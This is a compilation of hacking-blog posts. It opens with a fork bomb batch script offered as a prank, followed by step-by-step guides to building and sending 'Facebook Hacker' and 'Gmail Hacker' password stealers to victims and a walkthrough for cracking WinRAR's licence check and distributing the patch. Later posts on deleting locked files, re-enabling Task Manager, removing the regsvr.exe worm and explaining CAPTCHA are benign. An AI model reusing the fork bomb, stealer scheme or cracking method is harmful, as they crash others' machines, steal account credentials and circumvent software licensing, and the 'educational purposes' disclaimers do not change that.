A Fork Bomb (RABBIT VIRUS)

A fork bomb or rabbit virus opens an application for example cmd.exe so many times that its overloads the computers processor which results in the computer either overheating, shutting down or in some cases you can get a BSOD (blue screen of death). Unlike little batch viruses like the shutdown one you cannot stop a fork bomb unless you extremely 1337 so once it starts it goes until it does its job.

Most Anti-Virus software will not pick a fork bomb or rabbit virus, as far as its concerned its just a batch file the opens and application.

Background

Fork Bombs aka Rabbit viruses have been around for ages due to their effectiveness to evade anti-virus software. I came across it when i wanted to play a practical joke on my schools administrator for his birthday. Just to let you know it worked and hes not some n00b. I find them very effective just don’t bomb yourself.

The code

type the code in notepad and save it as <<somename.bat>>

please dont open the .bat file in your computer.

One more thing…I am not responsible if you kills your computer or somebody else computer with or without permission. Now that we have that out a the way here we go…

Blocks of code should be set as style “Formatted” like this.

:s

START %0

GOTO :s

Have fun guys and do leave your feedback about this article!

Hack Facebook Password

How to Hack Facebook Password | Facebook Hacker

Hey guys are you curious to know how to hack facebook using a software or hacking tool? Have you ever wondered how to hack facebook without phishing ,then here is a tool which is coded by me exclusively for the readers of HackingArticles.com!

By using this tool you can hack facebook password of your victim. I named this tool as facebook hacker.

Please read the below given tutorial to know how to use this Facebook Hacker tool to Hack Facebook Password.

TUTORIAL::

STEP 1: First ensure that you have installed Microsoft .Net Framework. If not, then you can download it from here: Download .Net Framework

STEP 2: DOWNLOAD the Facebook Hacker by Clicking Here!

STEP 3: Extract the downloaded “Facebook Hacker” file using Winrar. (If you don’t have it then you can GET IT HERE)

STEP 4: Open “Facebook Hacker.exe” file.

STEP 5: After opening the “Facebook Hacker.exe” file build your password stealer as shown in the image below:

Click on the image to Enlarge it.

STEP 6: Now a new file will be created in the same directory with the name you provided while building (eg. server.exe). Just send the file you created to the victim and if the victim runs this file….W00t….you will get his Facebook account’s username and password to your fake email ID which you provided while building the file.

NOTE: The “Stub.exe” file may get detected by your anti-virus. Please don’t open the “Stub.exe” file and don’t delete it too, otherwise the stealer created by you won’t work at all.

I hope you liked my tool and this post too.

Please feel free to ask any questions and your suggestions would be great for me.

DISCLAIMER: The tool provided in this article is for Educational & Testing purposes only

Hacking Gmail Password using Gmail Hacker

Disclaimer – By Reading this tutorial You agree that this tutorial is intended for educational purposes only and the author can not be held liable for any kind of damages done whatsoever to your machine, or damages caused by some other,creative application of this tutorial.
In any case you disagree with the above statement,stop here.

This Gmail hacker is one of the best software to hack Gmail password. The only thing you have to do is to build your own Gmail Hacker and send this Gmail hacker to the victim. I’ve provided the link below for the download:

1. First ensure that you have installed Microsoft .Net Framework. If not, then you can download it from here: Download .Net Framework

2. Click HERE to download Gmail Hacker

3. Download Winrar (free download here) to extract Gmail hacker folder.

4. Now, run Gmail Hacker Builder.exe file on your computer to see :

5. Enter in your email address and password (** I RECOMMEND CREATING A FAKE ID AND ENTER THE DETAILS OF THAT FAKE ID ONLY**) So that people should not have a fear of losing their real email IDs in a doubt about this application ) and hit on Build. Then Gmail hacker builder will create your own Gmail hacker application – Gmail Hacker.exe file which you can use to hack gmail password.

6. Now, send this Gmail Hacker.exe file to victim  and tell him that this Gmail hacker is used to hack Gmail password. Ask him to run Gmail Hacker.exe and enter all information (which includes his Gmail id and password plus Gmail ID of the victim he wanna hack).

7. As he enters the information and hits “Hack Them”, he will receive an error message as shown below:

7. In return, you will receive an email in your email account like this:

9. You’re Done!! You got his Gmail ID n password!

Crack any version of WinRAR

You can crack any version of WinRAR using this method and need not to pay for the registration fee and you can do this all by your self,easily. Furthermore, major software are cracked using the same way,but just get a bit complex in the methodology. This tutorial is intended for those who are new to cracking and disassembling.

Disclaimer – By Reading this tutorial You agree that this tutorial is intended for educational purposes only and the author can not be held liable for any kind of damages done whatsoever to your machine, or damages caused by some other,creative application of this tutorial.
In any case you disagree with the above statement,stop here.

The Tools
To perform this hack you will be needing –

1. Any De-assembler (I use Hackers Disassembler and Hview )
2. Resource Hacker
3. A patch Creator ( Use Universal Patch Creator or Code fusion)

You will be able to get them by googling ..

How to Crack ?
You need to have a bit knowledge of assembly language,and in case you don’t have it,just cram the steps and it will work anytime,every time. Download the latest version of WinRAR from their website and install it.
I will be cracking Winrar 3.80 here (cuz I already have it:P ). This is basically a 2 step process ( 4 step ,if you want to do things with a professional touch,period) .

Now copy the WinRAR.exe file to desktop. Make a copy of it there.

Step 1 – Hunting for Memory Address
Now load Hackers Disasembler and load the copy in it.

The Disassembler will disassemble the executable in assembly code. Now you need to search for strings that are used in WinRAR program. Press Ctrl + F and type “evaluation” without quotes and search in the assembly code. Hit enter..

After you have reached this block of code by searching, just look at the block of code above it. There you will find that some assembly values are being compared and then code is jumped to some other function. Now see carefully, the “evaluation copy” function must be invoked after some specific condition is met. We need to look for it at the code and the make certain changes to the condition so that the program doesn’t checks for the condition.

In the above code you can see this code –

00444B6A: 803DF4B84B0000 cmp byte ptr [004BB8F4], 00
00444B71: 0F859B000000 JNE 00444C12

This is the code responsible for validating you as a legal user 🙂 . Just note down the memory address that leads to jump (JNE) at some memory location. In this case, note down 00444B71 .
Note : For any WinRAR version, this code and memory address might be different,but the JNE will be same. Just note down the respective memory address that checks.
Now you need to search for the code that brings that ugly nag screen “Please purchase WinRAR license” after your trial period of 40 days is over. For this,look over your toolbar and click on “D” which stands for looking for Dialog references.

Now in the dialog box that opens,search for “please” and you will get the reference as –

ID-REMINDER, “Please purchase WinRAR license”

Double click on it and you will reach the subsequent code.

The code will be something like

* String: “REMINDER”
0048731A: 68EB5E4B00 push 004B5EEB

Just note the memory address that invokes the REMINDER dialog. In this case its 0048731A. Note it down.
Note : For any WinRAR version, this code and memory address might be different.But the Reminder Memory address code will always PUSH something. Just note down the respective memory address that PUSH ‘s.

Step 2 – Fixing and Patching
Now in this step we will be patching up values of memory addresses we noted earlier. I will be doing this using HVIEW.
Now load the copy you disassembled in Hacker’s Disassembler in Hview.

After you have loaded it, you will see the code is unreadable. Its just like opening an EXE file in notepad. You need to decode it. To do that, just press F4 and yoiu will get an option to decode it. Hit DECODE and you will be able to see code in the form of assembly code and memory addresses.

After you have done that, you need to search for memory addresses you noted down earlier. Just hit F5 and a search box will be there. Now you need to enter the memory address. To do that, enter a “.” and the type memory address neglecting the earlier “00” . The “.” will suffice for “00”. ie –

Type .444B71 in place of 00444B71

and search in the code.

After you have reached the respective code, you need to make changes to it. Press F3 and you will be able to edit the code.Now make the following changes –

After you have done it, save it by pressing F9.
Now search for next memory location by pressing F5 and entering it. Reach there and make the following changes by pressing F3 –

Save the changes by pressing F9 and exit HVIEW by pressing F10.
Congrats..You have cracked WinRAR 🙂 Replace the original WinRAR.exe with this copyofwinrar.exe by renaming it. It will work 100% fine 😛

Step 3 – Spicing up the EXE
Now U have a 100% working version of EXE, you might want to change your registration information in WinRAR. TO do this, you can use Resource hacker.

Launch Resource Hacker, load the copyofwinrar.exe in it

Now go to DIALOG –> Expand tree –> ABOUTRARDLG and click it. Now Find Trial copy line and replace it with your favorite one 😛

and click on Compile Script button.

Now save the file with any name on your desktop or any location what so ever.

Now you have a fully patched WinRAR.exe file :)) you can either use it, or also can distribute it like a real cracker. If you want to learn that, move on to next step.

Step 4 – Creating a working Patch (or giving Professional touch :
I will be using diablo2oo2’s Universal Patcher (UPE) for creating the patch. The patch will work like any authentic one for that WinRAR version. Just like the one U downloaded at anytime of your life from any Crack and Keygen website.
Launch Patch Creator and click on add new project. Enter project Information and click on save.

Click on Add – ; Offset patch

After you have done that, double click on offset patch and then

1. Give path of original winrar.exe
2. Give path of unmodified Winrar.exe (again)
3. Give path for fully patched Winrar.exe (ie Cracked Winrar.exe in this case)
4. Click on compare and it will show difference between both files
5. Click on save.

Now in the next window, click on Create Patch and save it. The Patch will be created. Now copy it in WinRAR installation directory and hit on patch, it WILL work.

Congrats you have created a patch of your own and have learned to crack WinRAR 🙂

You can crack other software in the same way…just practice,debug and disassemble and you will get the way 🙂

[PS: The above is the long way to do it, I will be telling you the shortest way to crack WinRAR in just 1 step, the main aim of this tutorial was to introduce you to disassemblers and tools, and do some dirty work with your hand. ]

Delete an Undeletable file

Ever had such an annoying message given by Windows?

It has many other flavors: Cannot delete file: Access is denied There has been a sharing violation. The source or destination file may be in use. The file is in use by another program or user. Make sure the disk is not full or write-protected and that the file is not currently in use.

Method 1
Open a Command Prompt window and leave it open.
Close all open programs.
Click Start, Run and enter TASKMGR.EXE
Go to the Processes tab and End Process on Explorer.exe.
Leave Task Manager open.
Go back to the command prompt window and change to the directory the AVI (or other undeletable file) is located in.
At the command prompt type DEL <filename> where <filename> is the file you wish to delete.
Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.
Close Task Manager.
Method 2
You can try this
Open Notepad.exe
Click File>Save As..>
locate the folder where ur undeletable file is
Choose ‘All files’ from the file type box
click once on the file u wanna delete so its name appears in the ‘filename’ box
put a ” at the start and end of the filename
(the filename should have the extension of the undeletable file so it will overwrite it)
click save,
It should ask u to overwrite the existing file, choose yes and u can delete it as normal

Method 3
Here’s a manual way of doing it.
1. Start
2. Run
3. Type: command
4. To move into a directory type: cd c:\<<path of your folder>>
5. If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without spaces. Example: cd c:\progra~1\kazaal~1
6. Once your in the folder the non-deletable file it in type in dir – a list will come up with everything inside.
7. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc… And if the file name has spaces you would use the special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad file.bmp you would type once in the specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make sure to type in the correct extension.

Method 4
Download Unlocker from Here .
Install it .Now go to folder where the “Undeletable” file is located.

1. Simply right click the folder or file and select Unlocker

2. If the folder or file is locked, a window listing of lockers will appear

3. Simply click Unlock All and you are done! Enjoy !!!

Task Manager disabled – Fix it!!

Many times when working on a computer that has been infected with a virus, Trojan, or piece of spyware I find myself with the Task Manager being disabled. Its the first priority of Malware creators to disable access to Task manager so that the user is not able to end the process of the running Malware.Until or unless you are working in an office,there is  seldom any restriction placed over Task manager by home users.So, I will be mentioning 5 methods to re-enable task manager and restore it to former glory.

To open the Task Manager, you normally would do one of the following:

• Press CTRL-ALT-DEL on the keyboard.
• Press CTRL-SHIFT-ESC on the keyboard.
• Right-click on a blank area on the start bar and choose Task Manager.
• Click on Start, Run and type TASKMGR in the run box and press Enter .

And if instead of opening of Task manager you see the screen given below,then you need to re-enable the task manager..

First we’ll begin with the various registry modification methods for correcting this problem.

Method 1

• Using the Group Policy Editor in Windows XP Professional .
• Click Start, Run, type gpedit.msc and click OK.
• Under User Configuration, Click on the plus (+) next to Administrative Templates.
• Click on the plus (+) next System, then click on Ctrl+Alt+Delete Options.
• Find Remove Task Manager in the right-hand pane and double click on it.
• Choose the option “Not Configured” and click Ok.
• Close the Group Policy Window .

Method 2

• Change the Task Manager Option through the Run line .
• Click on Start, Run and type the following command exactly and press Enter.

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f

It will restore your task manager and resolve your problem.

Method 3

• Change Task Manager through a Registry REG file .
• Click on Start, Run, and type Notepad and press Enter.
• Copy and paste the given code into Notepad and save it to your desktop as taskmanager.reg

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
“DisableTaskMgr”=dword:00000000

• Double click on the taskmanager.reg file to enter the information into the Windows registry.

Method 4
Delete the restriction in the registry manually

• Click on Start, Run, and type REGEDIT and press Enter.
• Navigate to the following branch

HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies\ System

• In the right pane, find and delete the value named DisableTaskMgr.
• Close the registry editor .

Method 5

• Download and Run FixTaskManager program.
• Click on the following links and download the program FixTaskManager to your Desktop

• Double-click on the file FixTaskManager on your desktop and run it .
• This will restore your Task manager.

I hope that was informative.

Remove Regsvr.exe and Newfolder.exe viruses completely from your computer

Plug a pendrive into a public computer and you will be pesked by the continuously replicating “New Folder.exe” virus or the “regsvr.exe” virus. Here is how you can remove “regsvr.exe” and “new folder.exe” from your computer.

Step 1 – Some Startup Repairs

First of all, boot into safe mode.After you get to your desktop,press F3 or Ctrl + F and search for “autorun.inf” file in your computer and delete all the subsequent files. I case you are no able to delete them, select all the files and uncheck the”Read Only” option. If you are still not able to delete them , you might want to try out Unlocker tool to delete the files.

Now go to

start – > run –> type ”msconfig”

and press enter

Go to startup tab and uncheck “regsvr”, click ok and then click on “Exit without restart”.

Now go to

control panel –> scheduled tasks and delete “At1” task listed there.

Once done, close all windows.

Step 2 – Changing Configurations

Your registry might be disabled,and you need to activate it back to undo all the malicious changes done by worm.In order to do that, you need to go to

start – > run –> type ”gpedit.msc”

and press enter

then navigate to

users configuration –> Administrative templates –> systems

Find “prevent access to registry editing tools” , double click it and change the option to disable.

Once done, your Regedit will be enabled. In case your task manager is disabled, you need to enable it. read my article on how to enable the disabled task manager.

Step 3 – Registry Edits

Now we have to perform some registry edits to enable our explorer and to remove all instances of worm from the registry. Go to

start – > run –> type ”regedit”

and press enter

Click on Edit –> Find and search for regsvr.exe . Find and delete all the occurrences of regsvr.exe virus (don’t delete  regsvr32.exe as its not a virus).

then navigate to entry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

and modify the entry

Shell = “Explorer.exe regsvr.exe”

to delete the regsvr.exe from it,so that it becomes

Shell = “Explorer.exe”

Once done, close all windows and get ready to delete all virus files.

Step 4 – Deleting Virus Files

The final step is to delete all the virus files in your computer. To do this, Press F3 or Ctrl + F and search for regsvr.exe (make sure to search in hidden folders ) and delete all “regsvr.exe” “svchost .exe” files (notice the gap between ‘svchost’ and ‘.exe’, keep in mind you don’t delete the legitimate file.).

Clean your recycle bin and restart your PC (perform a cold boot).

yeah….you have cleaned your computer from regsvr…just make sure to scan your pendrive the next time you plug in 🙂

What is CAPTCHA and how it works?

CAPTCHA or Captcha (pronounced as cap-ch-uh) which stands for “Completely Automated Public Turing test to tell Computers and Humans Apart” is a type of challenge-response test to ensure that the response is only generated by humans and not by a computer. In simple words, CAPTCHA is the word verification test that you will come across the end of a sign-up form while signing up for Gmail or Yahoo account. The following image shows the typical samples of CAPTCHA.

Almost every Internet user will have an experience of CAPTCHA in their daily Internet usage, but only a few are aware of what it is and why they are used. So in this post you will find a detailed information on how CAPTCHA works and why they are used.

What Purpose does CAPTCHA Exactly Serve?

CAPTCPA is mainly used to prevent automated software (bots) from performing actions on behalf of actual humans. For example while signing up for a new email account, you will come across a CAPTCHA at the end of the sign-up form so as to ensure that the form is filled out only by a legitimate human and not by any of the automated software or a computer bot. The main goal of CAPTCHA is to put forth a test which is simple and straight forward for any human to answer but for a computer, it is almost impossible to solve.

What is the Need to Create a Test that Can Tell Computers and Humans Apart?

For many the CAPTCHA may seem to be silly and annoying, but in fact it has the ability to protect systems from malicious attacks where people try to game the system. Attackers can make use of automated softwares to generate a huge quantity of requests thereby causing a high load on the target server which would degrade the quality of service of a given system, whether due to abuse or resource expenditure. This can affect millions of legitimate users and their requests. CAPTCHAs can be deployed to protect systems that are vulnerable to email spam, such as the services from Gmail, Yahoo and Hotmail.

Designing a CAPTCHA System::

CAPTCHAs are designed on the fact that computers lack the ability that human beings have when it comes to processing visual data. It is more easily possible for humans to look at an image and pick out the patterns than a computer. This is because computers lack the real intelligence that humans have by default. CAPTCHAs are implemented by presenting users with an image which contains distorted or randomly stretched characters which only humans should be able to identify. Sometimes characters are striked out or presented with a noisy background to make it even more harder for computers to figure out the patterns.

Most, but not all, CAPTCHAs rely on a visual test. Some Websites implement a totally different CAPTCHA system to tell humans and computers apart. For example, a user is presented with 4 images in which 3 contains picture of animals and one contain a flower. The user is asked to select only those images which contain animals in them. This Turing test can easily be solved by any human, but almost impossible for a computer.

Breaking the CAPTCHA::

The challenge in breaking the CAPTCHA lies in real hard task of teaching a computer how to process information in a way similar to how humans think. Algorithms with artificial intelligence (AI) will have to be designed in order to make the computer think like humans when it comes to recognizing the patterns in images. However there is no universal algorithm that could pass through and break any CAPTCHA system and hence each CAPTCHA algorithm must have to be tackled individually. It might not work 100 percent of the time, but it can work often enough to be worthwhile to spammers.